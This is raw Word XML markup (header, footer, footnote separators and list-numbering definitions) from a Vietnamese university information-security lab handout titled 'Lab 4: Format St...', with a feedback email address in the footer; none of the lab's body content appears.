            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658247" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6DDE2ED1" wp14:editId="3F9A1CC5">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-242570</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>1015365</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5068711" cy="3822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068711" cy="3822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CE4A10" w14:textId="7E40D9B8" w:rsidR="00C111DD" w:rsidRPr="008123AA" w:rsidRDefault="00C111DD">
                          <w:r w:rsidRPr="008123AA">
                            <w:rPr>
                              <w:i/>
                              <w:iCs/>
                            </w:rPr>
                            <w:t xml:space="preserve">Mọi góp ý về tài liệu, vui lòng gửi về email </w:t>
                          </w:r>
                          <w:r w:rsidR="00983E3B">
                            <w:rPr>
                              <w:i/>
                              <w:iCs/>
                            </w:rPr>
                            <w:t>inseclab</w:t>
                          </w:r>
                          <w:r w:rsidRPr="008123AA">
                            <w:rPr>
                              <w:i/>
                              <w:iCs/>
                            </w:rPr>
                            <w:t>@uit.edu.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E2ED1" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Text Box 54" o:spid="_x0000_s1035" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-19.1pt;margin-top:79.95pt;width:399.1pt;height:30.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" fillcolor="white [3201]" stroked="f" strokeweight="1pt">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="30CE4A10" w14:textId="7E40D9B8" w:rsidR="00C111DD" w:rsidRPr="008123AA" w:rsidRDefault="00C111DD">
                    <w:r w:rsidRPr="008123AA">
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                      </w:rPr>
                      <w:t xml:space="preserve">Mọi góp ý về tài liệu, vui lòng gửi về email </w:t>
                    </w:r>
                    <w:r w:rsidR="00983E3B">
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                      </w:rPr>
                      <w:t>inseclab</w:t>
                    </w:r>
                    <w:r w:rsidRPr="008123AA">
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                      </w:rPr>
                      <w:t>@uit.edu.vn</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D736B53" wp14:editId="65D77527">
          <wp:extent cx="1067457" cy="1247379"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="52" name="Picture 5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lock, meter&#10;&#10;Description automatically generated"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill rotWithShape="1">
                  <a:blip r:embed="rId1">
                    <a:extLst>
                      <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                        <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                      </a:ext>
                    </a:extLst>
                  </a:blip>
                  <a:srcRect l="23155" t="12398" r="18131" b="18992"/>
                  <a:stretch/>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1106913" cy="12934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29D5" w14:textId="77777777" w:rsidR="00B53237" w:rsidRDefault="00B53237" w:rsidP="00A349CB">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2BBC4D4A" w14:textId="77777777" w:rsidR="00B53237" w:rsidRDefault="00B53237" w:rsidP="00A349CB">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="4A4F87E0" w14:textId="77777777" w:rsidR="00B53237" w:rsidRDefault="00B53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BF52" w14:textId="1640D7CB" w:rsidR="00AA57CD" w:rsidRPr="00595D54" w:rsidRDefault="00946C14" w:rsidP="00AA57CD">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:ind w:left="900"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00595D54">
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Adobe Gothic Std B" w:hAnsi="UTM Neo Sans Intel"/>
        <w:b/>
        <w:noProof/>
        <w:color w:val="0070C0"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658244" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="375692C1" wp14:editId="3333F2A5">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>6957060</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="margin">
                <wp:posOffset>-417928</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CD08" w14:textId="77777777" w:rsidR="00985EDF" w:rsidRPr="00F20ED0" w:rsidRDefault="00985EDF"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007E7BE8"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75692C1" id="Group 23" o:spid="_x0000_s1028" style="position:absolute;left:0;text-align:left;margin-left:547.8pt;margin-top:-32.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C9CCD08" w14:textId="77777777" w:rsidR="00985EDF" w:rsidRPr="00F20ED0" w:rsidRDefault="00985EDF"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007E7BE8"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v:textbox>
              </v:rect>
              <w10:wrap anchorx="page" anchory="margin"/>
            </v:group>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidR="00491B22" w:rsidRPr="00595D54">
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Adobe Gothic Std B" w:hAnsi="UTM Neo Sans Intel"/>
        <w:b/>
        <w:noProof/>
        <w:color w:val="0070C0"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658246" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="188F6F97" wp14:editId="10300BDF">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50E51"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00636B92" w:rsidRPr="00595D54">
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Adobe Gothic Std B" w:hAnsi="UTM Neo Sans Intel"/>
        <w:b/>
        <w:color w:val="0070C0"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
      <w:t>Lab</w:t>
    </w:r>
    <w:r w:rsidR="001361DC" w:rsidRPr="00595D54">
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Adobe Gothic Std B" w:hAnsi="UTM Neo Sans Intel"/>
        <w:b/>
        <w:color w:val="0070C0"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00362EFA" w:rsidRPr="00595D54">
      <w:rPr>
        <w:rFonts w:ascii="UVN Viet Sach" w:eastAsia="Adobe Gothic Std B" w:hAnsi="UVN Viet Sach"/>
        <w:b/>
        <w:color w:val="0070C0"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
        <w:lang w:val="vi-VN"/>
      </w:rPr>
      <w:t>4</w:t>
    </w:r>
    <w:r w:rsidR="00636B92" w:rsidRPr="00595D54">
      <w:rPr>
        <w:rFonts w:ascii="UVN Viet Sach" w:eastAsia="Adobe Gothic Std B" w:hAnsi="UVN Viet Sach"/>
        <w:b/>
        <w:color w:val="0070C0"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
      <w:t xml:space="preserve">: </w:t>
    </w:r>
    <w:r w:rsidR="00953C90" w:rsidRPr="00595D54">
      <w:rPr>
        <w:rFonts w:ascii="UVN Viet Sach" w:eastAsia="Adobe Gothic Std B" w:hAnsi="UVN Viet Sach"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
      <w:t>Format St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5951" w14:textId="66266026" w:rsidR="00491B22" w:rsidRDefault="00491B22" w:rsidP="009358AF">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
        <w:b/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00A349CB">
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Adobe Gothic Std B" w:hAnsi="UTM Neo Sans Intel"/>
        <w:b/>
        <w:noProof/>
        <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
        <w:sz w:val="36"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658245" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="475C4FE1" wp14:editId="3B71343E">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2"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756BFD"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1361DC" w:rsidRPr="00A349CB">
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
        <w:b/>
      </w:rPr>
      <w:t xml:space="preserve">Bộ môn An toàn Thông tin </w:t>
    </w:r>
    <w:r w:rsidR="001361DC" w:rsidRPr="00A349CB">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:t>–</w:t>
    </w:r>
    <w:r w:rsidR="001361DC" w:rsidRPr="00A349CB">
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
        <w:b/>
      </w:rPr>
      <w:t xml:space="preserve"> Khoa </w:t>
    </w:r>
    <w:r w:rsidR="00EE4945">
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
        <w:b/>
      </w:rPr>
      <w:t>Mạng máy tính và Truyền thông</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="69438963" w14:textId="07E28D99" w:rsidR="00EE4945" w:rsidRPr="00A349CB" w:rsidRDefault="00EE4945" w:rsidP="009358AF">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
        <w:b/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
        <w:b/>
      </w:rPr>
      <w:t>Trường Đại học Công nghệ Thông tin – Đại học Quốc gia thành phố Hồ Chí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212872C8"/>
    <w:lvl w:ilvl="0" w:tplc="0D862A8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1B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="778CA6F0"/>
    <w:lvl w:ilvl="0" w:tplc="3912E5B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Yêu cầu %1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="0070C0"/>
        <w:u w:color="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17285"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75A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4085C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="052CCB04"/>
    <w:lvl w:ilvl="0" w:tplc="F3E40C8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="547" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>
        <w:bCs w:val="0"/>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0A449B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54581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1727B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F14981A"/>
    <w:lvl w:ilvl="0" w:tplc="672A26BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="391" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1111" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1831" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2551" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3271" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3991" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4711" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5431" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6151" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3AAE6F7E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="778CA6F0"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Yêu cầu %1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="0070C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B5A6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29CAAB9A"/>
    <w:lvl w:ilvl="0" w:tplc="D63A287E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"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90A22F6C"/>
    <w:lvl w:ilvl="0" w:tplc="8EC81DF8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="PhotoCaption"/>
      <w:lvlText w:val="Hình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84F2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0E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54404"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE4E47FA"/>
    <w:lvl w:ilvl="0" w:tplc="D97267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361C76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="486A5FE0"/>
    <w:lvl w:ilvl="0" w:tplc="A7107E48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1004" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>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65E12937"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C50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33A04"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B9A3046"/>
    <w:lvl w:ilvl="0" w:tplc="840C4382">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="699" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="UVN Viet Sach" w:eastAsia="Times New Roman" w:hAnsi="UVN Viet Sach" w:cs="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="042A0003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1419" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="042A0005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2139" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="042A0001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2859" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="042A0003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3579" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="042A0005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4299" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="042A0001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5019" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="042A0003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5739" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="042A0005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6459" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6DA22218"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94388C3E"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Yêu cầu %1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="0070C0"/>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BE4C55"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66D4618A"/>
    <w:lvl w:ilvl="0" w:tplc="E500DB2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Step"/>
      <w:lvlText w:val="Bước %1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="26"/>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A32108"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E582483E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:pStyle w:val="Heading1"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="0070C0"/>
        <w:sz w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading2"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="0070C0"/>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3124075"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D26C1A00"/>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D2B28DDA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2246" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="UVN Viet Sach" w:eastAsia="Times New Roman" w:hAnsi="UVN Viet Sach" w:cs="Arial" w:hint="default"/>
        <w:color w:val="auto"/>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7DFD162C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18B2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3365">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1344740713">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="235673027">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="259795634">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="238831253">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1321426700">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="263658722">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="872113929">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1111050931">
    <w:abstractNumId w:val="20"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="680818534">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1706757294">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1300305449">
    <w:abstractNumId w:val="20"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1219123073">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1702509543">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1880042914">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1711876944">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1328241344">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1766074175">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="115610981">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="175661218">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="470369888">
    <w:abstractNumId w:val="19"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="951742846">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="802231493">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1723283479">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1686058558">
    <w:abstractNumId w:val="19"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1896089506">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="112139223">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="961544602">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1277132789">
    <w:abstractNumId w:val="19"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1592155527">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1273246108">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="2080856657">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="2007442918">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1612740627">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1850020759">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="820804198">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="17997118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08"/>
    <w:rsid w:val="00002223"/>
    <w:rsid w:val="0000356C"/>
